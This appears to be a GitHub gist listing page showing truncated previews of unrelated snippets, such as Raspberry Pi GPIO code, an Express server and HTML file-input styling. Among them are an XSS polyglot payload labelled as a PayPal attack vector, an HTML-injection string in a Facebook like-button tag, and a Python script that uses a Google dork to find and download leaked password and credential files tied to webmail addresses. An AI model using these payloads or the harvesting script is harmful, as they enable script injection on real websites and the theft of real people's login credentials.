This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from time import sleep | |
| #print GPIO.RPI_REVISION 2 | |
| #print GPIO.VERSION 0.4.1a | |
| output_channel1 = 16 | |
| output_channel2 = 18 | |
| GPIO.setmode(GPIO.BOARD) | |
| GPIO.setup(output_channel1,GPIO.OUT) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // FF paypal attack vector | |
| // https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search | |
| ';alert(String.fromCharCode(48,120,80,114,48,120,121,32,119,97,115,32,104,101,114,101))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(48,120,80,114,48,120,121,32,119,97,115,32,104,101,114,101))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(48,120,80,114,48,120,121,32,119,97,115,32,104,101,114,101))</SCRIPT><!-- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import RPi.GPIO as GPIO | |
| #print GPIO.RPI_REVISION 2 | |
| #print GPIO.VERSION 0.4.1a | |
| input_channel = 16 | |
| output_channel = 18 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var express = require('express'); | |
| var app = express(); | |
| var port = process.env.PORT || 5000; | |
| var request = require('request'); | |
| var zlib = require('zlib'); | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script> | |
| function myLoadHandler(evt) | |
| { | |
| if (evt.persisted) { | |
| alert('user returns to page from another tab'); | |
| return; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <style> | |
| #file{ | |
| display:none; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <div id="file"><img src="http://www.geeksquad.nl/client/geeksquad/images/geek-squad-logo.png"/></div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <style> | |
| #file{ | |
| display:none; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <div id="file">Choose File</div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from google import search | |
| import requests | |
| for url in search("inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", stop=20): | |
| try: | |
| filename = url.split('/')[-1] | |
| print 'writing %s...' %filename | |
| r = requests.get(url) | |
| with open('%s' % filename, 'wb') as code: | |
| code.write(r.content) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #plain simple viewing | |
| port install jp2a | |
| jp2a path-to-image.jpg --term-width | |
| #for view with animation | |
| git clone https://github.com/jtwaleson/decrypt/ | |
| cd decrypt/ | |
| jp2a path-to-image.jpg --term-width | ./decrypt.py |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <fb:like | |
| href="http://www.url.com/Zoek?searchphrase=all&searchword=''"><h1>No Tag Escape? - 0xPr0xy</h1><br/><IMG SRC=http://infosecindia.com/wp-content/uploads/2011/06/hacker.jpg>" | |
| layout="button_count" | |
| show_faces="false" | |
| width="100" | |
| colorscheme="light" send="false" action="like" font="arial"> | |
| </fb:like> |